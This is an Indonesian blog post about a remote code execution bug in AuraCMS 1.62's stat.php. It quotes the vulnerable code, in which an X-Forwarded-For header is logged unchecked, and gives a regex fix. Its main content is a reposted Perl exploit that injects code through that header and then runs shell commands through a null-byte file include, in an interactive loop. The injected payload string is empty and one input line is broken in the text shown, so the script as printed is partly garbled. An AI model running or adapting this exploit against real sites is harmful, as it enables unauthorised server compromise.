Sebenarnya Bug ini sudah lama ditemukan tapi saya baru tau baru2 ini saja setelah baca2 artikel di newhack.org. Apa pernah website kalian terutama yg memakai engine dari auracms versi 1.62 seperti web ini kedatangan tamu yg g diundang yg menyamar sebagai administrator namanya t4mugel4p jika pernah berarti website anda telah disinggahi beliau ada kemungkinan bug yg masih belum di perbaiki pada tubuh auracms 1.62 yg anda gunakan.

Dimana letak bugnya? bug terletak pada file stats.php pada folder mod bug ini ditemukan oleh k1tk4t entah bersemedi berapa lama untuk menemukan bug ini ditemukan pada bulan januari 2008 waah lama juga kok baru tau sekarang seeh...!!! heee iya cos lagi males update n jarang2 ngenet seehh maklum kanting lagi cekak. Untung aja setelah saya cek belum ada satupun tamu yg mencoba web ini bersyukur saya heee...3x 

berikut celah yg ditemukan oleh k1tk4t :

Kutu pada berkas "stat.php" didalam direktori /mod pada aplikasi web auracms 1.62
# ---//---
# 17. Function User_Online ($minutes, $NamaFile){
# 18. //$ip = $REMOTE_ADDR;
# 19. $ip = getenv("HTTP_X_FORWARDED_FOR");
# 20. if (getenv("HTTP_X_FORWARDED_FOR") == ''){
# 21. $ip = getenv("REMOTE_ADDR");    
# 22. }
# ---//---
# 47. fseek($f,0,SEEK_SET);
# 48. ftruncate($f,0);
# 49. array_pop($user);
# 50. foreach ($user as $line)
# 51.      {
# 52.     list($savedip,$savedtime) = split("\|",$line);
# 53.     if ($savedip == $ip) {$savedtime = $time;$found = 1;}
# 54.     if ($time < $savedtime + ($minutes * 60))
# 55.         {
# 56.         fputs($f,"$savedip|$savedtime\n");
# 57.         $users = $users + 1;
# 58.         }
# 59.     }
# 60.
# 61. if ($found == 0)
# 62.     {
# 63.     fputs($f,"$ip|$time\n");
# 64.     $users = $users + 1;
# 65.     }
# 66.
# 67. fclose ($f);
# ---//---
#
# Sebagai Contoh;
# $ip = getenv("HTTP_X_FORWARDED_FOR");
# $ip =   # <-- user menginjeksi phpinfo
# format yang tersimpan
# |WAKTUBERKUNJUNG
#
# pada AuraCMS versi 1.62, log di simpan pada berkas /mod/online.db.txt [Default]
#
# pada Mod Block Statistik, log disimpan pada berkas /logs/online.db.txt [Default]
#
# pada AuraCMS versi 2.x mod "online", getenv("HTTP_X_FORWARDED_FOR") bisa berakibat terjadinya "SQL Injection"

#
# => "Perbaikan Kutu stat.php"
# ---//---
# 19. $ip = getenv("HTTP_X_FORWARDED_FOR");
# 20. if (preg_match('/^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$/', getenv("HTTP_X_FORWARDED_FOR")) == ''){
# 21. $ip = getenv("REMOTE_ADDR");
# ---//---

berikut exploit yg dibuat oleh k1tk4t, tapi jangan di coba ya....!!! klo ada yg menyala gunakan exploit ini saya tidak tanggung jawab loech gitu e katae k1k4t hee...

# ----------------------------[Mulai]------------------------------------
use IO::Socket;

if(!$ARGV[2])
{
 print "\n  |-------------------------------------------------------|";
 print "\n  |            Indonesian Newhack Technology              |";
 print "\n  |-------------------------------------------------------|";
 print "\n  | AuraCMS 1.62 (stat.php) Remote Code Execution Exploit |";
 print "\n  |                  Coded by k1tk4t                      |";
 print "\n  |-------------------------------------------------------|";
 print "\n[!] ";
 print "\n[!] Penggunaan : perl auracms162.pl [Site] [Path] [Port]";
 print "\n[!] Contoh     : perl auracms162.pl localhost /aura162/ 80";
 print "\n[!] ";
 print "\n";
 exit;
}

$oriserver = $ARGV[0];
$orihost   = "http://".$oriserver;
$oridir    = $ARGV[1];
$oriport   = $ARGV[2];

print "- Melakukan Koneksi $orihost$oridir\r\n";
 
$injurl = "index.php?pilih=stat&mod=yes";
$injeksi = $oridir.$injurl;
$kodeterlarang = "";
print "- Sedang menginjeksi kode jahat\r\n";
$injkode =  IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$oriserver", PeerPort => "$oriport") || die "- Koneksi Gagal...\r\n";
print $injkode "GET ".$injeksi." HTTP/1.1\n";
print $injkode "Host: ".$oriserver."\r\n";
print $injkode "X-Forwarded-For: ".$kodeterlarang."\r\n";
print $injkode "\r\n\r\n";
close ($injkode);

while($perintah !~ "mati")
{
$ekseurl = "index.php?pilih=online.db.txt%00&mod=yes&cmd=".$perintah."";
$eksekusi = $oridir.$ekseurl;
print "- Sedang mencoba menjalankan kode injeksi\r\n";
$eksekode =  IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$oriserver", PeerPort => "$oriport") || die "- Koneksi Gagal...\r\n";
print $eksekode "GET ".$eksekusi." HTTP/1.1\n";
print $eksekode "Host: ".$oriserver."\r\n";
print $eksekode "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11";
print $eksekode "Accept: */*\r\n";
print $eksekode "Connection: close\r\n\n";

while ($hasil = <$eksekode>)
    {
    print $hasil;
    }
print "[+]perintah => ";
$perintah = ; 
}